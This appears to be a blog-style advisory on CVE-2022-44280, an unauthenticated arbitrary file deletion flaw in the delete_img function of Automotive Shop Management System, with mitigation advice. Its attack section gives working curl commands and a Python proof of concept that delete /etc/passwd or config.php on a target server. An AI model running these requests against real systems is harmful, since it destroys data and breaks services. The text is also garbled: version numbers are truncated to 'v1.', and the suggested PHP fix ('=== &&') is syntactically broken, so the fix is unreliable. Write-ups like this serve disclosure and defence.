Automotive Shop Management System (ASMS) is a popular, open-source tool used by car repair shops to manage jobs, parts, customers, and more. But a critical vulnerability has been uncovered in version 1., tracked as CVE-2022-44280. This bug allows anyone with network access—including hackers—to delete *any* file on the server, just by making a web request to a specific URL.
Let's break down what this means, how the vulnerability works, see an example exploit, and what you can do to protect your business.
What is CVE-2022-44280?
CVE-2022-44280 describes an *arbitrary file deletion* vulnerability in ASMS v1.. This means anyone can tell the software to delete files from the server—even important system files—without logging in or needing any special permissions. This happens via the delete_img function in Master.php, which doesn't properly check what files it's being told to erase.
The issue is in the following PHP file and function
File: /asms/classes/Master.php
Function: delete_img
When a request is made to
/asms/classes/Master.php?f=delete_img
with a specific parameter, the software deletes the file you mention—no questions asked.
A simplified view of the flawed code inside Master.php
if($_GET['f'] == 'delete_img'){
$file = $_POST['file_path']; // Takes user input directly
if(file_exists($file)){
unlink($file); // Deletes the file
}
}
Do you see the problem? There’s no check on what file_path is set to. An attacker can set file_path to *any* location on the server that the web server user can access.
Step 1: The Attacker Crafts a Malicious Request
They send a POST request to the vulnerable URL and set the file_path to a sensitive file. For example, to delete the critical /etc/passwd file on a Linux server (which would break logins):
curl -X POST http://victim-site.com/asms/classes/Master.php?f=delete_img \
-d "file_path=/etc/passwd"
Or, to delete the site’s own configuration file
curl -X POST http://victim-site.com/asms/classes/Master.php?f=delete_img \
-d "file_path=../../config.php"
Step 2: The Server Blindly Obeys
The code checks if the file exists and then deletes it with unlink()—no user authentication needed.
Step 3: Your Website or Server Breaks
Depending on what gets deleted, the website could crash, customer or job records could disappear, or the whole server could become unusable.
Here's a simple Python example for demonstration purposes
import requests
target = 'http://victim-shop.com/asms/classes/Master.php?f=delete_img';
data = {'file_path': '/etc/passwd'} # Any file the attacker wants
response = requests.post(target, data=data)
print('Status:', response.status_code)
print('Response:', response.text)
Warning: Do not use this code against any site without authorization.
Permanent damage. Deleted files are gone unless you have backups.
- Easy entry for ransomware. Cybercriminals could use this bug to destroy backups before extorting you.
1. Restrict file deletion
Change the code to *only* let ASMS delete files in safe, expected upload folders.
$uploads_dir = '/path/to/uploads/';
$file = realpath($uploads_dir . $_POST['file_path']);
if(strpos($file, $uploads_dir) === && file_exists($file)){
unlink($file);
}
2. Require Authentication
Only allow authenticated, authorized users to use sensitive functions like deleting images.
Check for an official patch
- Original project GitHub
- Vulnerability summary - CVE Details
- Exploit Database entry
If no patch is available, consider disabling the affected endpoint entirely.
Conclusion
CVE-2022-44280 in Automotive Shop Management System v1. is a severe vulnerability that could bring your business to a halt. If your website or client installs this software, check your version immediately and patch the vulnerability as soon as possible.
For more information
- CVE-2022-44280 - NVD
- Exploit-DB PoC
- Original Issue on GitHub
Timeline
Published on: 11/23/2022 16:15:00 UTC
Last modified on: 11/28/2022 18:07:00 UTC